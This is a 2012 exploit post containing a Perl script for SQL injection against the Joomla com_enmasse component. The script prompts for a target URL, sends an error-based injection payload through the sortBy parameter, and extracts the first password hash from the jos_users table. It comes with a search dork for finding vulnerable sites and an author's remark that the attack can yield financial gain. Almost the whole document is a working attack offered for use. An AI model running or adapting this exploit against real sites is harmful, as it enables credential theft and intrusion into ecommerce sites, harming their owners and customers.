Joomla Enmasse SQL Injection

`   
  
# Exploit Title: Joomla com_enmasse Remote Exploit  
  
# Author: Daniel Barragan "D4NB4R"  
  
  
# Español  
  
# hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra   
# de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es   
# posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por   
# defecto de joomla.  
  
# English  
  
# hi, this exploit affects ecommerce sites so the exploit only give a sample of the   
# possible extraction of data, I am not responsible for any use that is given. since   
# it is possible to obtain economic profit through this. the script is done with joomla default tables.  
  
  
  
#!/usr/bin/perl -w  
  
########################################  
# Exploit Title: Joomla com_enmasse Remote Exploit  
#  
# Dork: inurl:index.php?option=com_enmasse  
#  
# Date: [06-08-2012]  
#   
# Author: Daniel Barragan "D4NB4R"  
#   
# Twitter: @D4NB4R  
#   
# site: http://poisonsecurity.wordpress.com/  
#   
# Vendor: http://www.matamko.com/  
#   
# Version: 1.2.0.4 (last update on Jul 27, 2012)  
#   
# License: Enmasse 6 Months Support & Subscription - USD$358.20  
#  
# Demo: http://www.matamko.com/products/filexpress/live-demo.html  
#   
# Tested on: [Linux(bt5)-Windows(7ultimate)]  
#  
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc....   
########################################  
  
print "\t\t\n\n";  
print "\t\n";  
print "\t Daniel Barragan D4NB4R \n";  
print "\t \n";  
print "\t Joomla com_enmasse Remote Exploit \n";  
print "\t\n\n";  
  
use LWP::UserAgent;  
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";  
  
chomp(my $target=<STDIN>);  
  
$concatene="concat(password)";  
$table="jos_users";  
$d4nb4r="floor";  
$com="com_enmasse";  
$seleccione="select";  
  
  
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
  
$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";  
  
$res = $b->request(HTTP::Request->new(GET=>$host));  
$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/) {  
  
print "\n Hash Admin : $1\n\n";  
print " El exploit fue exitoso si desea ver mas datos modifique el script\n";  
print " The exploit was successful if you want to see more data modify the script\n";  
  
}  
else{print "\n[-] No se pudo, intente manualmente\n";}  
  
#####Daniel Barragan D4NB4R 2012################  
`